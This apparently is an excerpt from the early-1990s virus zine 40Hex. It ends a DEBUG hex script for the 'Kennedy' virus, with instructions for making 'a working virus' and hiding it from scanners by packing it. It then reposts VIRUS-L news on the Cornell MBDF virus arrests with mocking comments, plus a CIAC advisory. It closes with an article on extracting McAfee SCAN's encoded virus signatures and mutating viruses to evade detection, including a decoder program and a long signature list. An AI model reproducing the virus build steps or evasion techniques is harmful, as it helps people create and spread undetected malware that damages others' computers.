61 64 20 4B 65 6E 6E 65 64 79 e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00 e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 rcx 027F w q ---------------------------------Cut Here----------------------------------- Ok there it is. Not the most impressive virus around and its caught by just about every scan on the market, but take PKLite to it and then remove the PKLite header (Use NOLITE in this issue) and no one will be able to find it. Anyway it gets the job done. To make the above hex into a working file, first cut on the dotted lines. Name the resulting file KENNEDY.TXT. Then: DEBUG < KENNEDY.TXT and you'll have a working virus. -Instigator 40Hex Number 6 Volume 2 Issue 2 File 008 Take a look at this. I picked it up on fidonet, originally from Virus-L digest. all the stuff in *< >*'s are my comments. - Demogorgon ------------------------------ VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44 ------------------------------ Date: Tue, 25 Feb 92 10:10:14 -0500 >From: mha@baka.ithaca.ny.us (Mark Anbinder) Subject: MBDF Suspects Arrested (Mac) The Cornell Daily Sun reported in this morning's issue that two Cornell University sophomores, David Blumenthal and Mark Pilgrim, were arrested Monday evening and arraigned in Ithaca City Court on one count each of second degree computer tampering, in connection with the release of the MBDF virus that infected Macs worldwide over the last several days. The two are being held in Tompkins County Jail. *< huh? How does one get arrested for spreading a virus, you ask? read on >* Further charges are pending. --- ** many lines of mail routing crap have been deleted ** Date: Tue, 25 Feb 1992 11:47:32 PST >From: lipa@camis.stanford.edu (Bill Lipa) Subject: Alleged MBDF virus-creators arrested at Cornell "Computer Virus Traced to Cornell Students" by Jeff Carmona [The Cornell Daily Sun, 25 February 1992] Two Cornell students were arrested yesterday for allegedly creating and launching *< launching ? Bon voyage, we launched you !>* a computer virus that crippled computers around the world, according to M. Stuart Lynn, the University's vice president for information technologies. David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of Public Safety officers and arraigned in Ithaca City Court on one count of second-degree computer tampering, a misdemeanor, *< cool, its only a misdemeanor, how bad could it be ? >* Lynn said. Both students were remanded to the Tompkins County Jail and remained in custody early this morning. They are being held on $2,000 cash or $10,000 bail bond, officials said. Cornell received national attention in Nov. 1988 when Robert T. Morris Jr., a former graduate student, was accused of unleashing a computer virus into thousands of government and university computers. Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined $10,000, given a three-year probation and ordered to do 400 hours of community service by a federal judge in Syracuse, according to Linda Grace-Kobas, *< Whats a Koba?? >* director of the Cornell News Service. Lynn would not compare the severity of the current case with Morris', saying that "each case is different." Lynn said the virus, called "MBDFA" was put into three Macintosh games -- Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle. On Feb. 14, the games were launched from Cornell to a public archive at Stanford University in Palo Alto, Calif, Lynn said. *< I guess these guys actually put it up on the archive under their own >* *< accounts! Don't they know they can trace that stuff? duhhh... >* From there, the virus spread to computers in Osaka, Japan and elsewhere around the world *< the archive was a dumb idea if thats how they got caught, but it spread like hell >* when users connected to computer networks via modems, he added. It is not known how many computers the virus has affected worldwide, he explained. When computer users downloaded the infected games, the virus caused "a modification of system software," *< oooh...lets not get too technical >* Lynn said. "This resulted in unusual behavior and system crashes," he added. Lynn said he was not aware of anyone at Cornell who reported finding the virus on their computers. The virus was traced to Cornell last Friday, authorities were quickly notified and an investigation began, Lynn said. "We absolutely deplore this kind of bahavior," Lynn said. "We will pursue this matter to the fullest." Armed with search warrants, Public Safety investigators removed more than a dozen crates full of evidence from the students' residences in Baker and Founders halls on West Campus. *< sounds like a typical, over-kill bust to me. If you don't know what it is, take it. >* Public Safety officials refused to disclose the contents of the crates or issue any comment about the incident when contacted repeatedly by phone last night. *< thats because they don't know what the fuck the stuff is >* "We believe this was dealt with very quickly and professionally," Lynn said. The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today and additional charges are pending, according to Grace-Kobas. Because spreading a computer virus violates federal laws, "conceivably, the FBI could be involved," she added. Officials with the FBI could not be reached to confirm or deny this. Blumenthal and Pilgrim, both 19-year-olds, were current student employees at Cornell Information Technologies (CIT), Lynn said. He would not say whether the students launched the virus from their residence hall rooms or From a CIT office. Henrik N. Dullea '61, vice president for University relations, said he thinks "the act will immediately be associated with the University," not only with the individual students charged. Because a major virus originated from a Cornell student in the past, this latest incident may again "bring a negative reaction to the entire institution," Dullea said. *< "blah, blah, blah" >* "These are very selfish acts," Lynn said, referring to the intentional distribution of computer viruses, because innocent people are harmed. Lynn said he was unaware of the students' motive for initiating the virus. Lynn said CIT put out a notice yesterday to inform computer users about the "very virulent" virus. A virus-protection program, such as the new version of Disinfectant, can usually cure computers, but it may be necessary to "rebuild the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your- hard-drive" !>* in some cases, he added. A former roommate of Blumenthal said he was not surprised by news of the arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller '95, his roommate from last semester. "He was in front of the computer all day," Fuller said. Blumenthal, who had a modem, would "play around with viruses because they were a challenge to him," Fuller said. He said that, to his knowledge, Blumenthal had never released a virus before. -->-<------ Cut Here -------------------------- ------------------------------ VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46 ------------------------------ Date: Wed, 26 Feb 92 11:08:45 -0800 >From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk) Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac) NO RESTRICTIONS _____________________________________________________ The Computer Incident Advisory Capability ___ __ __ _ ___ / | / \ / \___ __|__ /___\ \___ _____________________________________________________ INFORMATION BULLETIN New Virus on Macintosh Computers: MBDF A February 25, 1992, 1130 PST Number C-17 ________________________________________________________________________ NAME: MBDF A virus PLATFORM: Macintosh computers-except MacPlus and SE (see below) DAMAGE: May cause program crashes SYMPTOMS: Claris applications indicate they have been altered; some shareware may not work, unexplained system crashes DETECTION & ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6, VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0 ________________________________________________________________________ Critical Facts about MBDF A A new Macintosh virus, MBDF A, (named for the resource it exploits) has been discovered. This virus does not appear to maliciously cause damage, but simply copies itself from one application to another. MBDF A was discovered at two archive sites in newly posted game applications, and has a high potential to be very widespread. Infection Mechanism This virus is an "implied loader" virus, and it works in a similar manner to other implied loader viruses such as CDEF and MDEF. Once the virus is active, clean appliacation programs will become infected as soon as they are executed. MBDF A infects only applications, and does not affect data files. This virus replicates under both System 6 and System 7. While MBDF A may be present on ALL types of Macintosh systems, it will not spread if the infected system is a MacPlus or a Mac SE (although it does spread on an SE/30). Potential Damage The MBDF A virus has no malicious damaging characteristics, however, it may cause programs to inexplicably crash when an item is selected from the menu bar. Some programs, such as the shareware "BeHierarchic" program, have been reported to not operate correctly when infected. Applications written with self-checking code, such as those written by the Claris corporation, will inform the user that they have been altered. When MBDF A infects the system file, it must re-write the entire system file back to disk; this process may take two or three minutes. If the user assumes the system has hung, and reboots the Macintosh while this is occuring, the entire system file will be corrupted and an entire reload of system software must then be performed. This virus can be safely eradicated from most infected programs, although CIAC recommends that you restore all infected files from an uninfected backup. Detection and Eradication Because MBDF A has been recently discovered, only anti-viral packages updated since February 20, 1992 will locate and eradicate this virus. All the major Macintosh anti-viral product vendors are aware of this virus and have scheduled updates for their products. These updates have all been available since February 24, 1992. The updated versions of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6, SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10. Some Macintosh applications (such as the Claris software mentioned above) may contain self-verification procedures to ensure the program is valid before each execution; these programs will note unexpected alterations to their code and will inform the user. MBDF A has been positively identified as present in two shareware games distributed by reliable archive sites: "Obnoxious Tetris" and "Ten Tile Puzzle". The program "Tetricycle" (sometimes named "Tetris-rotating") is a Trojan Horse program which installs the virus. If you have downloaded these or any other software since February 14, 1992 (the day these programs were loaded to the archive sites), CIAC recommends that you acquire an updated version of an anti-viral product and scan your system for the existence of MBDF A. For additional information or assistance, please contact CIAC: Karyn Pichnarczyk (510) 422-1779 or (FTS) 532-1779 karyn@cheetah.llnl.gov Call CIAC at (510)422-8193/(FTS)532-8193. Send e-mail to ciac@llnl.gov PLEASE NOTE: Many users outside of the DOE and ESnet computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Some of the other teams include the NASA NSI response team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team. Your agency's team will coordinate with CIAC. CIAC would like to thank Gene Spafford and John Norstad, who provided some of the information used in this bulletin. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. -->-<----- Cut Here ------------------------- --- ------------------------------ VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46 ------------------------------ Date: Wed, 26 Feb 92 15:32:02 -0500 >From: mha@baka.ithaca.ny.us (Mark Anbinder) Subject: Cornell MBDF Press Release (Mac) _____________________________________________________ PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91 Students charged with releasing computer virus By Linda Grace-Kobas Following a university investigation that tracked a computer virus and its originators, two Cornell students were arrested and charged with computer tampering for allegedly launching a computer virus embedded in three games into national computer archives. Arraigned Feb. 24 in Ithaca City Court were David S. Blumenthal, 19, a sophomore in the College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the College of Arts and Sciences. They were charged with computer tampering in the second degree, a Class A misdemeanor. The pair is being held in Tompkins County Jail with bail set at $2,000 cash bond or $10,000 property bond. At a hearing Tuesday afternoon, Judge Sherman returned the two to jail with the same bond and recommended that they remain in jail until at least Friday pending the federal investigation. A preliminary hearing is set for April 10. Both students were employed by Cornell Information Technologies, which runs the university's computer facilities. Pilgrim worked as a student operator in an Apple Macintosh facility from which the virus is believed to have been launched. The university's Department of Public Safety is working with the Tompkins County district attorney's office, and additional charges are expected to be filed. The Federal Bureau of Investigation has contacted the university to look at possible violations of federal laws, officials said. The Ithaca Police Department is also assisting in the investigation. "We absolutely abhor this type of behavior, which appears to violate the university's computer abuse policy as well as applicable state and federal law," commented M. Stuart Lynn, vice president for information technologies, who headed the investigation to track the originators of the virus. "Cornell will pursue all applicable remedies under our own policies and will cooperate with law enforcement authorities." Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus embedded in versions of three computer games, Obnoxious Tetris, Tetricycle and Ten Tile Puzzle, had possibly been launched through a Cornell computer. A virus is normally embedded in a program and only propagates to other programs on the host system, he explained. Typically, when an infected application is run, the virus will attack the system software and then other applications will become infected as they are run. The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly into several computer archives in the U.S. and abroad, including SUMEX-AIM at Stanford University and archives at the University of Texas, the University of Michigan and another in Osaka, Japan. These archives store thousands of computer programs available to users of Internet, the worldwide computer network. Macintosh users who downloaded the games to their computers were subject to a variety of problems, notably the modification of system software and application programs, resulting in unusual behavior and possible system crashes. Apparently, there was no intent to destroy data, Lynn said, but data could be destroyed in system crashes. Reports of the virus have been received from across the United States and around the world, including Wales, Britain, Lynn said, adding that he has no estimate for the number of individuals who might have obtained the games. As soon as the virus was identified, individuals and groups across the country involved with tracking viruses sent messages across computer networks to alert users who might have been affected by the virus, Lynn added. The virus has since been removed from all archives and "disinfectant" software available to the Internet community has been modified so that individual Macintosh users can purge their computers of it. "Our sense is that the virus was controlled very rapidly," he said. In 1988, Cornell received national attention when graduate student Robert T. Morris Jr. launched a computer virus into important government and university research networks. That virus, actually considered a "worm" since it was self-perpetuating, caused major damage in high-level systems. Morris was convicted under the 1986 Computer Fraud and Abuse Act and fined $10,000, given three years probation and ordered to do 400 hours of community service by a federal judge in Syracuse, N.Y. The new virus differs greatly from the Morris worm, Lynn said. "This virus is not to be compared with the Morris worm, which independently moved from machine to machine across the network," he explained. All Macintosh users should take appropriate measures to be certain their systems are not infected with the virus. News Service science writer William Holder also contributed to this report. --- Mark H. Anbinder 607-257-2070 - FAX 607-257-2657 BAKA Computers, Inc. QuickMail QM-QM 607-257-2614 200 Pleasant Grove Road mha@baka.ithaca.ny.us Ithaca, NY 14850 -->-<----- Cut Here ------------------------- 40Hex Number 6 Volume 2 Issue 2 File 009 -=[ The 'McAfee scan' viral footprint codes ]=- -or- /*******************************************/ /* A fool and his scanner, can part a user */ /* from his hard earned money. */ /*******************************************/ - written by - GodNet Raider - of - The CyberUnderground Thrown into 40Hex by DecimatoR from Usenet alt.security -=[ "Information is the greatest weapon of power to the modern wizard." ]=- ]----------------------------------------------------------------------------[ Introduction: ------------- Recently I began to wonder about the usefulness of 'virus scanners' and what if any difference do they have with a simple text/hex search program (like nortons filefind/ts). An if there was no real DIFFERENCE, how secure is the system that used them. Problems with scanning: ----------------------- The first question I had to ask was, What does a 'virus scanner' actually look for? Does it only look for one string of codes or several at different places in the file? To answer this question I called a local BBS an dl'ed McAfee's scan3.7v64 (to evaluate and after my tests, it was erased for its lack of offering any real protection). Then I went to my archives to retrieve some viruses I have experimented with in the past (of which where Jerusalem B and Dark Avenger). I ran scan to verify that the virus files where viruses (3 of which did not set off any alarm even tho there was a listing in the documentation for them, so I removed them from the test). Then using a sector editor looked at the source for the McAfee asso. scan3.7v64 (here after know just as scan64) to find that the footprint information was encoded. Needless to say this did not stop me (for the sake of those who are into the tech aspects of things, the actual method used to get the codes are included at the end of the article with the codes found), It took less than an hour to get the codes I was looking for (without disassembling the code but by looking into the memory allocated to the program). What I found out was scan was just a simple hex searcher (that kept its data locked up till needed). It could also be fooled by any program that contained the same hex string as a real virus (this was proved when , using a sector editor, I added the scan64 footprint for the Jerusalem B into the top of a text file (a place this code would never show up in a real infection) then renamed it to *.com; scan64 reported it as infected). Once the codes where obtained, using debug directly on a virus file, I was able to mutate the virus to no longer be detectable by scan64 without destroying the integrity of it. For the virus was still able to infect files, and scan64 could no longer track it. I was still able to track and control it using norton's filefind, diskmon, diskedit, and (of course) DOS erase. So it seems my question was answered. Some 'virus scanners' just scan for a single string of hex character. This is fine if viruses NEVER changed or programs would NEVER use code similar to what a virus would (the smaller the footprint string the bigger the chance of mistaken alarms). For if a 'virus scanner' programer just keeps making a new release each time there is a new virus (an I will not get into the morality of charging customers the full price of an software upgrade rather than allowing them to buy/dl new footprint data files as they become available) for the program will eventually grow to unwealdable sizes. An it should be noted there are other programs that may do the same job faster, more upward compatibility, and you may already have them on hand. a possible solution: -------------------- One thing that I think is a good idea is when a program allows users to add new footprint data to it (like nortons' virus package). For now users don't need to buy new releases for detection of viruses they may not get/be able to detect. Instead for the cost of a call to a support bbs (part of the original software agreement?) the user can get new data as it becomes available or when they fine a new one on their system they can immediately add the new footprint rather than wait for the next version to be released. Method used to obtain footprints: --------------------------------- After finding the data I was looking for was encoded I thought, How can I get the data I wanted for my tests? Disassembling was out, not for any MORAL reason but, for the time involved. So I thought it must have to decode the data for it's own use and to save time it would do it all before the scan rather than slow the process down by doing a full decode. So I needed to look at the memory image of the running program. Thanks to DOS 5.0 and dosshell I was able to do this. After spawning the scan task under the dos shell I used alt-tab to swap back to the shell. Once back in the shell I used the shell commands to copy the tmpxxx.swp to foo.img and terminating scan64 and dosshell. Then using a sector editor I searched though the temp file created by the dos shell. I found an area of data that contained the virus names and non ascii text data separating them. Even though the strings of ascii data (virus names) ended with a zero character (as variable strings have a tendency to), the random data did not end with a common signal character (as expected for code can be any character). There was also no character count stored (the data length varied so it could not be assumed by the scan program as well). So I continued to search though the data. I eventually found another area that had the same text strings (virus names). This time the first character of the none ascii data gave the count of the data size to the following text string. I knew I had found it so I extracted this data to another file (starting at 0 offset in the new file). Then wrote down the some codes and checked them against viruses I had. The codes I had did not seem match. This did not stop me. I took one virus (that my understanding said scan was only looking for 6 consecutive bytes to match) and started zapping bytes (in a file scan said was infected) to find what it was looking for. The processes involved zapping one sector at a time till scan said it was not infected, then half of that sector, then half of a half, and so on. It came down to 6 CONSECUTIVE bytes as I expected. But they where DIFFERENT from the ones I had. So I went to the windows calculator (it allows byte arithmetic in hex, ie.. 0xff + 0x04 = 0x03 (rollover, carry is ignored), it would be outside the scope of this ARTICLE to explain why I thought byte arithmetic was important). Some quick subtraction found a 0x93 (decimal 147) DIFFERENCE between the actual codes and the ones from the allocated memory uses by scan. So taking another virus that scan said was infected I did the minor hex math on the codes in the allocated memory used by scan and found the codes. Then i zapped only the codes and ran scan on the updated virus file. It said there was no infection. I knew I now had the right codes (after a few more checks). So I created a simple C program (see below) to convert the extract file I created and converted the codes to a readable form (output from program listed at end of ARTICLE). Then tested other viruses against the list. An found the same results. Binary to hex program: ---------------------- /* fp2txt.c Convert footprint binary information to text. by GodNet Raider Notes: Please forgive the unrefined/unannotated nature of this code it was designed as a one shot. */ #include #include #define TRUE 1 #define MAGICNUM 0x93 void main (void); void main (void) { unsigned char sVirusFP [128], *ptVirusInfo, szVirusName [128]; register unsigned int nTmpCnt; FILE *Stream; Stream = fopen ("fp2.img", "rb"); while (!feof (Stream)) { ptVirusInfo = sVirusFP; if (!(*sVirusFP = getc (Stream))) exit (0); nTmpCnt = (unsigned int) *sVirusFP; while (nTmpCnt--) *(++ptVirusInfo) = ((unsigned char) getc (Stream)) - MAGICNUM; ptVirusInfo = szVirusName; while ((*(ptVirusInfo++) = getc (Stream))); printf ("\n%s:\n ", szVirusName); ptVirusInfo = sVirusFP; nTmpCnt = (unsigned int) *sVirusFP; while (nTmpCnt--) { printf ("0x%02x ", (unsigned int) *(++ptVirusInfo)); if (nTmpCnt && !((*sVirusFP - nTmpCnt) % 8)) printf ("\n "); } printf ("\n"); getc (Stream); } exit (0); } Footprints discovered: ---------------------- The following is a list of the footprint codes found in McAfee asso. Scan3.7v64. 1008 Virus [1008]: 0x81 0xed 0x38 0x00 0xe8 0xc3 Stoned-II Virus [S-2]: 0x9c 0x2e 0xff 0x1e 0x09 0x00 VHP-2 Virus [VHP2]: 0x1c 0x8c 0x44 0x02 0xb8 0x24 0x35 0xcd 0x21 0x89 VHP Virus [VHP]: 0x07 0x89 0x7e 0x8a 0x8d 0x7e 0x90 0x89 0x7e 0x88 Taiwan3 Virus [T3]: 0x17 0x0f 0x32 0x0a 0x32 0x0a 0x90 0x0b 0xfb 0x08 Armagedon Virus [Arma]: 0xb8 0x00 0x43 0xcd 0x21 0x2e 0x89 0x0e 0x48 0x01 1381 Virus [1381]: 0x1e 0x06 0x8c 0xc8 0x8e 0xd8 0xb8 0x40 0x00 0x8e Tiny Virus [Tiny]: 0xb4 0x40 0x8d 0x94 0xab 0x01 0xb9 0x02 0x00 0xcd Subliminal Virus [Sub]: 0x8b 0x3e 0x25 0x01 0x8b 0xd7 0x2e 0x8e 0x06 0x27 Sorry Virus [Sorry]: 0xeb 0x96 0x83 0x2e 0x12 0x00 0x40 0x83 0x2e 0x03 1024 Virus [1024]: 0xc8 0x75 0xed 0x8b 0xd1 0xb8 0x00 0x42 0xcd 0x21 0x72 RedX Virus [RedX]: 0x52 0x8b 0x9c 0x17 0x04 0xb9 0x19 0x03 0x8d 0x94 VP Virus [VP]: 0x21 0x89 0x1e 0x22 0x03 0x8c 0x06 0x24 0x03 0xb4 Print Screen-2 [P-2]: 0x74 0x01 0xbf 0x03 0x00 0xb9 0x20 0x00 0xf3 0xa4 Joshi Virus [Joshi]: 0xf3 0xa4 0x8c 0xc0 0x05 0x20 0x00 0x8e 0xc0 0xbb Microbes Virus [Micro]: 0x8e 0xd0 0xbc 0x00 0xf0 0xfb 0xa1 0x13 0x04 0x2d 0x04 Print Screen Virus [Prtscr]: 0xcd 0x05 0xfe 0xc8 0xa2 0x60 0x01 0xc3 0x6f 0x6e 0x2d Form Virus [Form]: 0xe8 0xb2 0x00 0x5a 0x5e 0x1f 0x33 0xc0 0x50 0xb8 0x00 0x7c June 13th Virus [J13]: 0x12 0x00 0xb9 0xb1 0x04 0x2e 0x30 0x04 0x46 0xe2 JoJo Virus [JoJo]: 0x4d 0x2b 0xd0 0x4a 0x45 0x03 0xe8 0x45 0x8e 0xc5 Victor Virus [Victor]: 0x74 0x26 0x80 0xfc 0x5b 0x74 0x21 0x80 0xfc 0x39 5120 Virus [5120]: 0x10 0xa2 0xf6 0x0f 0xe8 0xd0 0xfe 0x80 0x3e 0x4a 0x10 0x02 0x7d 0x22 0xc6 0x46 W-13 Virus [W13]: 0xf3 0xa4 0x8b 0xfa 0xb4 0x30 0xcd 0x21 0x3c 0x00 Slow Virus [Slow]: 0x81 0xc6 0x1b 0x00 0xb9 0x90 0x06 0x2e 0x80 0x34 Liberty Virus [Liberty]: 0xe8 0xfd 0xfe 0x72 0x2a 0x3b 0xc1 0x7c 0x27 0xe8 Fish Virus [Fish]: 0x0e 0x01 0xcf 0xe8 0x00 0x00 0x5b 0x81 0xeb 0xa9 Shake Virus [Shake]: 0x31 0xd2 0x8b 0xca 0xcd 0x21 0x3d 0x00 0xf0 0x73 Murphy Virus [Murphy]: 0x81 0x7c 0xfe 0x2e 0x43 0x75 0xed 0xb8 0x02 0x3d V800 Virus [V800]: 0x51 0xad 0x33 0xd0 0xe2 0xfb 0x59 0x31 0x15 0x47 Kennedy Virus [Kennedy]: 0x8c 0x55 0x02 0xb8 0x01 0x43 0x33 0xc9 0xcd 0x21 Yankee Two Virus [Doodle2]: 0x73 0x03 0x5a 0x5e 0xc3 0x8b 0xf2 0xf6 0x44 0x15 1971 Virus [1971]: 0x33 0xd2 0xb8 0x00 0x42 0xcd 0x21 0x72 0x26 0x81 0x7c June 16th Virus [June16]: 0x4d 0xa9 0xa5 0x2e 0x70 0x66 0x2e 0x57 0x09 0x0f AIDS II Virus [A2]: 0xa4 0x00 0x55 0x89 0xe5 0x81 0xec 0x02 0x02 0xbf 0xca 0x05 0x0e 0x57 0xbf 0x3e 0x01 1210 Virus [1210]: 0xc4 0x74 0xf0 0x2e 0x80 0x3e 0x2f 0x04 0x01 0x75 1720 Virus [1720]: 0xd8 0x2e 0xa1 0x2c 0x00 0xa3 0xfc 0x03 0x2e 0xa0 Saturday 14th Virus [Sat14]: 0x0e 0x1f 0xb8 0x24 0x35 0xcd 0x21 0x8c 0x06 0x6f XA1 (1539) Christmas Virus [XA1]: 0xfa 0x8b 0xec 0x58 0x32 0xc0 0x89 0x46 0x02 0x81 1392 (Amoeba) Virus [1392]: 0x16 0xa3 0x21 0x01 0x8b 0x44 0x14 0xa3 0x23 0x01 Vcomm Virus [Vcomm]: 0x77 0x02 0xb9 0x20 0x00 0xb4 0x4e 0xcd 0x21 ItaVir Virus [Ita]: 0xb8 0x58 0x45 0x89 0x40 0x02 0xb0 0x00 0x88 0x40 0x04 Korea Virus [Korea]: 0x8e 0xd0 0xbc 0xf0 0xff 0xfb 0xbb 0x13 0x04 Solano Virus [Solano]: 0x12 0x75 0x0e 0x2e 0x8b 0x0e 0x03 0x01 V2000 Virus [2000]: 0x51 0xe8 0x39 0xfd 0x8e 0xc3 0x26 0x8b 12 Tricks Trojan [Tricks]: 0x64 0x02 0x31 0x94 0x42 0x01 0xd1 0xc2 0x4e 0x79 0xf7 12 Tricks Trojan [Tricks-B]: 0xe4 0x61 0x8a 0xe0 0x0c 0x80 0xe6 0x61 1559 Virus [1559]: 0x03 0x26 0x89 0x1e 0x92 0x00 0xfb 0xc3 0x50 0x53 0x51 0x52 0x06 512 Virus [512]: 0x01 0x8c 0x45 0x70 0x1f 0x89 0x57 0x14 0x8c 0xca 0x8e 0xda EDV Virus [EDV]: 0x75 0x1c 0x80 0xfe 0x01 0x75 0x17 0x5b 0x07 0x1f 0x58 0x83 Icelandic-3 Virus [Ice-3]: 0x24 0x2e 0x8f 0x06 0x3b 0x03 0x90 0x2e 0x8f 0x06 Perfume Virus [Fume]: 0x04 0x06 0xbf 0xba 0x00 0x57 0xcb 0x0e 0x1f 0x8e 0x06 Joker Virus [Joke]: 0x56 0x07 0x45 0x07 0x21 0x07 0x1d 0x49 0x27 0x6d 0x20 0x73 0x6f 0x20 0x6d 0x75 0x63 Virus-101 [101]: 0xb3 0x01 0xb4 0x36 0x70 0xb7 0x01 0xb4 0x36 0x70 0x8b 0x37 0xb4 0x36 0x70 0xb3 0x03 0xb4 0x36 0x70 0x03 0xf3 0xb4 Halloechen Virus [Hal]: 0x8c 0xd0 0x8b 0xd4 0xbc 0x02 0x00 0x36 0x8b 0x0e Taiwan Virus [Taiwan]: 0x8a 0x0e 0x95 0x00 0x81 0xe1 0xfe 0x00 0xba 0x9e Oropax Virus [Oro]: 0x3e 0x01 0x1d 0xf2 0x77 0xd1 0xba 0x00 Chaos Virus [Chaos]: 0xa1 0x49 0x43 0x68 0x41 0x4f 0x53 0x50 0x52 0x51 0xe8 4096 Virus [4096]: 0xf6 0x2e 0x8f 0x06 0x41 0x12 0x2e 0x8f 0x06 0x43 Virus-90 [90]: 0x81 0xb8 0xfe 0xff 0x8e 0xd8 0x2d 0xcc AIDS Information Trojan [Aids]: 0x31 0x30 0x30 0x2c 0x36 0x32 0x2c 0x33 0x32 0x00 Devil's Dance Virus [Dance]: 0x5e 0x1e 0x06 0x8c 0xc0 0x48 0x8e 0xc0 0x26 Amstrad Virus [Amst]: 0x72 0x02 0xeb 0x36 0x76 0xba 0x80 0x00 0xb4 0x1a 0xcd 0x21 0x80 0x3e Datacrime II-b Virus [Crime-2B]: 0x2e 0x8a 0x07 0x32 0xc2 0xd0 0xca 0x2e Holland Girl Virus [Holland]: 0x36 0x03 0x01 0x33 0xc9 0x33 0xc0 0xac Do Nothing Virus [Nothing]: 0x72 0x04 0x50 0xeb 0x07 0x90 0xb4 0x4c Lisbon Virus [Lisb]: 0x8b 0x44 0x79 0x3d 0x0a 0x00 0x72 0xde Sunday Virus [Sunday]: 0x75 0x10 0x07 0x2e 0x8e 0x16 0x45 0x00 0x2e 0x8b Typo COM virus [Typo]: 0x99 0xfe 0x26 0xa1 0x5a 0x00 0x2e 0x89 DBASE Virus [Dbase]: 0x80 0xfc 0x6c 0x74 0xea 0x80 0xfc 0x5b 0x74 0xe5 Ghost Virus : 0x90 0xea 0x59 0xec 0x00 0xf0 0x90 0x90 Jerusalem Virus Strain B [Jeru]: 0x47 0x00 0x33 0xc0 0x8e 0xc0 0x26 0xa1 0xfc 0x03 Alabama Virus [Alabama]: 0x8f 0x06 0x18 0x05 0x26 0x8f 0x06 0x1a 1701/1704 Virus - Version B [170X]: 0x31 0x34 0x31 0x24 0x46 0x4c Datacrime Virus [Crime]: 0x36 0x01 0x01 0x83 0xee 0x03 0x8b 0xc6 0x3d 0x00 Stoned Virus [Stoned]: 0x00 0x53 0x51 0x52 0x06 0x56 0x57 0xbe Vacsina virus [Vacs]: 0xb8 0x01 0x43 0x8e 0x5e 0x0e 0x8b 0x56 0x06 0x2e Den Zuk Virus : 0x8e 0xc0 0xbe 0xc6 0x7c 0xbf 0x00 0x7e Ping Pong Virus (old string): 0x59 0x5b 0x58 0x07 0x1f 0xea Pakistani Brain Virus [Brain]: 0x8e 0xd8 0x8e 0xd0 0xbc 0x00 0xf0 0xfb 0xa0 0x06 Yale/Alameda Virus [Alameda]: 0xb4 0x00 0xcd 0x13 0x72 0x0d 0xb8 0x01 Lehigh Virus [Lehigh]: 0x5e 0x83 0xee 0x03 0x8b 0xde 0x81 0xeb 0x91 0x01 Pakistani Brain/Ashar Virus [Brain]: 0x20 0x8c 0xc8 0x8e 0xd8 0x8e 0xd0 Fu Manchu Virus - Version A [Fu]: 0x26 0xc7 0x06 0xfc 0x03 0xf3 0xa4 0x26 0xc6 0x06 Ping Pong Virus - Version B [Ping]: 0xa1 0xf5 0x81 0xa3 0xf5 0x7d 0x8b 0x36 0xf9 0x81 1536 (Zero Bug) Virus [Zero]: 0xeb 0x2b 0x90 0x5a 0x45 0xcd 0x60 0x2e Vienna (DOS 62) Virus - Version B [Vienna]: 0x8b 0xfe 0x36 0x6f 0xc7 0x1f 0x36 0x6f 0x8b 0xde 0x36 0x6f 0xc6 0x1f Ghost Version of DOS-62 [Ghost-C]: 0x8e 0xd8 0xa1 0x13 0x04 0x2d 0x02 0x00 0x90 0xa3 0x13 Friday 13th Virus [Fri13]: 0xb4 0x4f 0xcd 0x21 0x73 0xf7 0x58 405 virus [405]: 0x19 0xcd 0x21 0x26 0xa2 0x49 0x02 0xb4 0x47 0x04 0x01 0x50 3066/2930 Traceback Virus [3066]: 0x14 0x8b 0x4d 0x16 0x8b 0xc1 0x8a 0xcd Pentagon Virus : 0xeb 0x34 0x90 0x48 0x41 0x4c 0x20 0x20 Israeli Boot Virus: 0xcd 0x13 0xb8 0x02 0x02 0xb9 0x06 0x27 0xba 0x00 0x01 Typo Boot Virus: 0x24 0x13 0x55 0xaa Datacrime-2 Virus [Crime-2]: 0x8a 0x94 0x03 0x01 0x8d 0xbc 0x29 0x01 0x8d 0x8c 0xea 0x06 Ohio Virus: 0xeb 0x29 0x90 0x49 0x34 0x12 0x00 0x01 0x00 0x00 0x00 0x00 3551 (Syslock) Virus [Syslock]: 0x33 0x06 0x14 0x00 0x31 0x04 0x46 0x46 0xe2 0xf2 Dark Avenger virus [Dav]: 0xa1 0x4f 0x07 0x89 0x07 0x2e 0xa1 0x51 MIX1/Icelandic Virus [Ice]: 0x43 0x81 0x3f 0x45 0x58 0x75 0xf1 0xb8 0x00 0x43 Disk Killer Virus [Killer]: 0xc3 0x10 0xe2 0xf2 0xc6 0x06 0xf3 0x01 0xff 0x90 0xeb 0x55 AIDS Virus [Taunt]: 0x42 0xe8 0xef 0xe3 0xbf 0xca 0x03 0x1e Yankee 